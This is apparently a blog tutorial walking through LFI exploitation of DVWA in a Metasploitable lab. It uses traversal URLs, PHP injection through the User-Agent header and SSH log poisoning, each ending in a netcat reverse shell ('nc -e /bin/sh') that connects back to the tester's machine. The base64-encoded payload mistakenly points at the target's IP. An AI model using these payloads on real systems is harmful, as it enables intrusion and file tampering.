...

Local File Inclusion(LFI) Vulnerability & Remote Files Access From Server Using LFI

LFI Vulnerability কি?

 

LFI হল একটি ওয়েব দুর্বলতা যা ওয়েবসাইট বা ওয়েব অ্যাপ্লিকেশন প্রোগ্রামারদের ভুলের ফলে হয়। হ্যাকার Malicious ফাইলগুলি Inject করার জন্য এই দুর্বলতার সুবিধা নিতে পারে যার মাদ্ধমে ওয়েবসাইট / ওয়েব এপ্লিকেশন এ এক্সেস নিতে পারে।

Local File Inclusion(LFI) Vulnerability

 

Payloads to get access using remote code


● /proc/self/environ
● /var/log/auth.log
● /var/log/apache2.accesslog

 

LFI Vulnerability Live Process: using /etc/passwd & /proc/self/environ payloads


> Open Metasploitable machine > ifconfig > take IP
> In kali browser > put the IP > click DVWA
> DVWA user : admin & password: password
> DVWA > Security low
> go > File Inclusion & Get the link

● Link : http://192.168.37.129/dvwa/vulnerabilities/fi/?page=include.php
● Try to see the directory: http://192.168.37.129/dvwa/vulnerabilities/fi/include.php

Local File Inclusion(LFI) Vulnerability


LFI vulnerability Check using payload:


We will see in this server LFI vulnerability exist or not, so we will use payload or malicious code to check that.

payload or malicious code: /etc/passwd
● Imposing payload to access the main directory(in browser) : http://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../etc/passwd

>> This vulnerability will work on DVWA low and medium security*

Local File Inclusion(LFI) Vulnerability


Payloads to get access using remote code


/proc/self/environ
/var/log/auth.log
/var/log/apache2.accesslog

Replace /etc/passwd to /proc/self/environ
———-
http://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../proc/self/environ

Local File Inclusion(LFI) Vulnerability


Remote Code Execution (PHP Code)


Now using burpsuite we will execute remove code

> In kali > search with burp > open
> set up proxy in mozilla > mozilla > settings > search with proxy > choose manual proxy & put the IP 127.0.0.1 & Port: 8080

● now go burp > proxy > intercept on & visit the link from mozilla: http://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../proc/self/environ
> now you capture the request in burp

Local File Inclusion(LFI) Vulnerability


> In Burp click INSPECTOR (at right) > request header > user agent > click arrow


> now we will add a remote PHP code to check its getting execute ?
> add this code: <? phpinfo(); ?>

Local File Inclusion(LFI) Vulnerability


> apply changes > forward the request
> in browser you will see DVWA is showing its php informations
> so remote code can be executed

Local File Inclusion(LFI) Vulnerability 100%

 


Using Netcat we will take server access now


Netcat or NC is a utility tool that uses TCP and UDP connections to read and write in a network. In the case of attacking. It helps us to debug the network along with investing it. It runs on all operating systems. In Kali its installed in default.

First, we will have to create a listener. We will use the following command to create a listener. POrt can be anything like 8080, 8888.
● in kali : nc -h (to see all cmd)
● nc -l -vv -p 8888

where,
[-l]: Listen Mode
[-vv]: Verbose Mode {It can be used once, but we use twice to be more verbose, it is used to know information about server / machine}
[p]: Local Port

Local File Inclusion(LFI) Vulnerability 100%


Add reverse shell to burp


● in burp > again intercept ON > capture request of http://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../proc/self/environ
● INSPECTOR > user agent > put the reserve shell code : <?passthru(“nc -e /bin/sh 192.168.37.128 8888”);?>
(NB: 192.168.37.128 is my kali IP)
Local File Inclusion(LFI) Vulnerability


● now in kali > NC get the connection

> pwd (to see direcory)
> ls (see all files)
> cd /var/www/dvwa/
> Now you go to root file and you can hamper any file
Local File Inclusion(LFI) Vulnerability

 

LFI Vulnerability Live Process: using another payload (/var/log/auth.log) and get access using SSH Port


● DVWA : Security : Medium
● Instead of http://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../etc/passwd we will use http://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../var/log/auth.log

Local File Inclusion(LFI) Vulnerability 100%

create a listener with Netcat:


> First, we will have to create a listener. We will use the following command to create a listener. POrt can be anything like 8080, 8888.
● nc -l -vv -p 8888

 

In another kali terminal we will execute the SSH Code


> General code : to access through SSH Port :

● ssh -oHostKeyAlgorithms=+ssh-rsa “<?passthru(‘nc -e /bin/sh 192.168.37.128 8888’);?>”@192.168.37.129

NB: like trying to access through SSH, user name: passthru/reverse shell@domain/IP
NB: 192.168.37.128 is my kali IP *
NB: 192.168.37.129 is my Metasploitable machine IP *

● encode nc -e /bin/sh 192.168.37.128 8888 using burp (open burp > decover > encode as base64 > get encoded code)
Local File Inclusion(LFI) Vulnerability


> after encode the SSH code will be

● ssh -oHostKeyAlgorithms=+ssh-rsa “<?passthru(base64_decode(‘bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjM3LjEyOSA4ODg4’));?>”@192.168.37.129
Local File Inclusion(LFI) Vulnerability


> In mozilla reload http://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../var/log/auth.log
> now see the netcat listening window & you get the connection
> pwd (to see direcory)
> ls (see all files)
> cd /var/www/dvwa/
> Now you go to root file and you can hamper any file

 

Local File Inclusion(LFI) Vulnerability

 

Thanks
Minhazul Asif

Share the Post:

Related Posts